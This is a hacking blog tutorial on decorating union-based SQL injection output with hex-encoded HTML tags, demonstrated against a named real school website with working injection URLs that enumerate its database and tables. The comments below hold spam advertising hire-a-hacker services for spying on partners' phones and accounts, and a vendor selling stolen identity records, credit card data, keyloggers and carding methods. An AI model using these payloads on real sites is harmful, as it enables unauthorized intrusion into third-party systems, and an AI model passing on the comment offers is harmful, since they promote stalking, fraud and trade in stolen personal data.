Adding HTML in SQL Injection ( SQLi FUN )




Salam Mad leets .. I wrote this article for my website .. thought to share it here aswell ..



Introduction:

In this tutorial i will show you how to add HTML tags and designs in your SQL Injection queries..

[Image: folder_HTML.png]


Purpose:


-----> By using HTML tags in our SQLi query, we can arrange the output in a proper way.


-----> Sometimes the result of our query appears in the source of the webpage or in the title or sometimes in the URL. In that case we add HTML tags to make it more visible on the webpage.





-----> I don't know about you guys but as you can see i like Colors and decoration .. ALOT .. Big Grin


Tutorial: 

First of all, i assume you guys have sound knowledge of SQL injection and Basic HTML.

For this Tutorial .. The site I'm going to inject is :


hxxp://www.dbhspgoa.edu.in


Here is the vulnerable link where parameter 'id' is vulnerable to a very simple SQLi.


hxxp://dbhspgoa.edu.in/Article.php?id=92


So, lets start with some very basic injection and i can quickly see that there are 9 Columns here.


hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,4,5,6,7,8,9--


[Image: makht1.JPG]

And I will inject in 4th column. so Lets get the database name in 4th column.


hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,concat(database()),5,6,7,8,9--


[Image: mkdb.JPG]

Now, look at the database name. Even though it is visible ( not in the source code but on the proper page ) but font size is very small .. Don't know about you .. but i don't like it. Undecided

Now, let me show you the wonders of HTML tags.

We can always add HTML in our SQLi query. Sometimes we can write it directly enclosed in single quotes like :


concat ('<opening_tags>', QUERY , '<closing_tags>')


But most of the times this syntax is not allowed and we have to convert our HTML tags in HEX . like ..


concat(0xHEX_value_of_opening_tag , QUERY , 0xHEX_value_of_closing_tag)




Notice these 0x here .. This means that what ever is written after this .. Decode it from HEX before executing.



Following are the basic usage of these tags. You can use your creativity and endless imagination.



Example 1:



Lets start with an HTML tag called <font>.



Usage <font size="8" color="red"> MakMan </font>



I'm going to use this tag in our query but in this website it doesn't allow to use HTML tags directly so we have to convert to HEX first. Just follow the syntax.


Now my format should be:


hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,concat(0xHEX_value_of_opening_tag,database(),0xHEX_value_of_closing_tag),5,6,7,8,9--


To convert in HEX, you can use many online tools. Just google :String to HEX converter
After converting my opening and closing tags in this case.



Opening_tag = <font size="8" color="red"> ---- HEX ---> 3c666f6e742073697a653d22382220636f6c6f723d22726564223e



Closing_tag </font> ---- HEX ---> 3c2f666f6e743e




Putting these HEX values in my format. My query will become:




hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,concat(0x3c666f6e742073697a653d22382220636f6c6f723d22726564223e,database(),0x3c2f666f6e743e),5,6,7,8,9--





Look at the Result now .. Sweet Big Grin

[Image: dbcol.JPG]



Example 2:

Mostly people write their names in SQL Injection with their query. Lets try that.

Creativity has no boundaries. 

My HTML Syntax before converting to HEX (Just to show you guys what I'm doing, It will not work You have to Convert it to HEX):

hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,group_concat(0x<br><font face='calibri' size="5" color="green">MakMan</font><font face='Impact' size="4" color="red">,table_name,0x</font>,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--


My HTML Syntax after converting it to HEX:


hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,group_concat(0x3c62723e3c666f6e7420666163653d2763616c69627269272073697a653d22352220636f6c6f723d​22677265656e223e4d616b4d616e202d2d2d3e3c2f666f6e743e3c666f6e7420666163653d27496d​70616374272073697a653d22342220636f6c6f723d22726564223e,table_name,0x3c2f666f6e743e),5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--

Check the result. Now just Imagine what else you can do with it.


[Image: mak1.JPG]



It took me an hour to write this thread but i want to share the credits of this tutorial with -ajkaro , the best SQL injector i have ever known. Let me show you guys some of his art work with manual SQLi.



[Image: ajkaro1.JPG]
...

[Image: ajkaro2.JPG]


NOTE: If you copy paste these links from here into your browser tab, make sure to paste it in notepad first and delete these bugs .. 

[Image: bug.JPG]
these Bugs Appear because when we copy paste directly from Blog thread page, we also copy some unicode characters like this zero width space &'#8203; which when comes in a query doesn't show the results properly .. 

About The Author

Salman Rafiq
Salman Rafiq is the Founder of 'My Basic Tricks'. I am a Security Researcher and Ethical Hacker, with experience in various aspects of Information Security and Other then I am SEO expert and a Blogger. My all efforts is to make internet more Security..

7 comments:

  1. لا اله الا الله محمد رسول اللهNovember 14, 2013 at 8:24 AM

    nice very good my brother

    ReplyDelete
    Replies
    1. AnonymousMarch 30, 2022 at 8:32 AM

      My Basic Tricks: Adding Html In Sql Injection ( Sqli Fun ) >>>>> Download Now

      >>>>> Download Full

      My Basic Tricks: Adding Html In Sql Injection ( Sqli Fun ) >>>>> Download LINK

      >>>>> Download Now

      My Basic Tricks: Adding Html In Sql Injection ( Sqli Fun ) >>>>> Download Full

      >>>>> Download LINK ba

      Delete
  2. AnonymousNovember 16, 2016 at 10:33 AM

    Hello everyone, I have tried blackhatservers@gmail.com and i have confirmed her good work among all of this hackers out there ,she helped me hack my cheating partner whatsapp, facebook and cell phone number. I listened to all his calls and I was able to get good evidence for my attorney for divorce. It was really a big surprise to me but glad I gave a try. Contact her for similar issues on blackhatservers@gmail.com and
    consider your big problem solved

    ReplyDelete
  3. mia santanaSeptember 9, 2017 at 3:42 PM

    I dont really know much about hacking after so many tries i met Cyberhacking lord who later help me find out my husband has been cheating on me and stealing from my bank account, he had this scheme going for 6 months. He gave me access to his mail,social media account,phone(could see deleted messages) and even track his location, still going to sue to him. Having doubts in your relationship? contact him (cyberhackinglord@gmail.com)

    ReplyDelete
  4. BrackettjamesSeptember 3, 2019 at 11:57 PM

    CYBER HACKS
    How well are you prepared for a Cyber incident or Breach?, Is your Data safe?
    Strengthen your Cybersecurity stance by contacting ALEXGHACKLORD,HACKS for a Perfect, Unique, Classic and Professional Job in Securing your Network against all sort of Breache, for we are Specially equipped with the Best hands to getting your Cyber Hack needs met
    We specialize in All type of cyber Jobs such as:
    #TRACKING of GPS location, cars, Computers, Phones (Apple, windows and Android), e.t.c.
    We also track E-mail account, Social media such as Facebook, Twitter, Skype, Whatsapp, e.t.c.
    #RECOVERY of Passwords for E-mail address, Phones, Computers, Social media Accounts, Documents e.t.c,.
    NOTE: we also help Scammed persons recover their money.
    #INSTALLATION of Spy ware so as to spy into someone else’s computer, phone or E-mail address and also Installation of Spy ware software on your individual O.S to know if your Gadget is being hacked into..
    We also Create and Install VIRUS into any desired computer gadget.
    #CRACKING into Websites, CCTV Survelance camera, Data base etc, of both Private and Govt organization, such as Schools, Hospitals, Court houses, The FBI, NSA e.t.c
    NOTE: We specialize in clearing of CRIMINAL RECORDS of diverse types.
    * We assure you that your Job will be attended to with care and efficiency as it will be handled with the Best professional hands in Cyber Hack business.
    #We also have a forum where you can get yourself equipped with Advanced hacking skills
    And if you’re Good with Hacking and you think you can Join our Team of SOPHISTICATED HACKERS, you’re welcome as well…
    CLASSIC CYBER HACKS gives you the Best service in the Hacking world.
    * We’re Classic Hacks *
    Write us on:
    *ALEXGHACKLORD@GMAIL. COM
    Signed,
    Collin

    ReplyDelete
  5. AlvirMay 24, 2020 at 8:16 PM

    I never thought I will come in contact with a real and potential hacker until I knew   brillianthackers800 at Gmail and he delivered a professional job,he is intelligent and understanding to control jobs that comes his way
    You can message on his number +1(385) 2501115,
    Contact him and be happy

    ReplyDelete
  6. Cyber ZoneFebruary 15, 2023 at 12:55 PM

    Hello Everyone

    If you're in search of Legit vendor for:

    Fullz/pros/Leads
    CC FUllz
    Hack-ing Tools & Tutorials
    Spamming Stuff with leads
    Office365 Leads & logs
    High Credit scroes fullz
    Carding Methods for Cashout & Transfers

    We are providing all these stuff with guarantee
    Proper Guidance & Assistance will be provided too needed
    Cheap prices for other platforms
    24/7 service available

    For Detials/Order

    .....WA +92 317 272 1122
    .....ICQ 752822040
    .....Telegram @killhacks / @leadsupplier

    Fullz Info
    NAME|SSN|DOB|DL|ADDRESS|EMIL|CONTACT|WORKHISTORY|ACCOUNDETAILS

    CC Fullz Info
    CC-NUMBER|MM|YYYY|CVV|NAME|SSN|ADDRESS|EMAIL|CONTACT

    TOOLS
    Mailers/RDP's/C-panels/Brutes/Key-loggers

    & many other stuff will be provided on demand

    ReplyDelete

Subscribe to: Post Comments (Atom)
Copyright © 2013 My Basic Tricks and Salman Rafiq.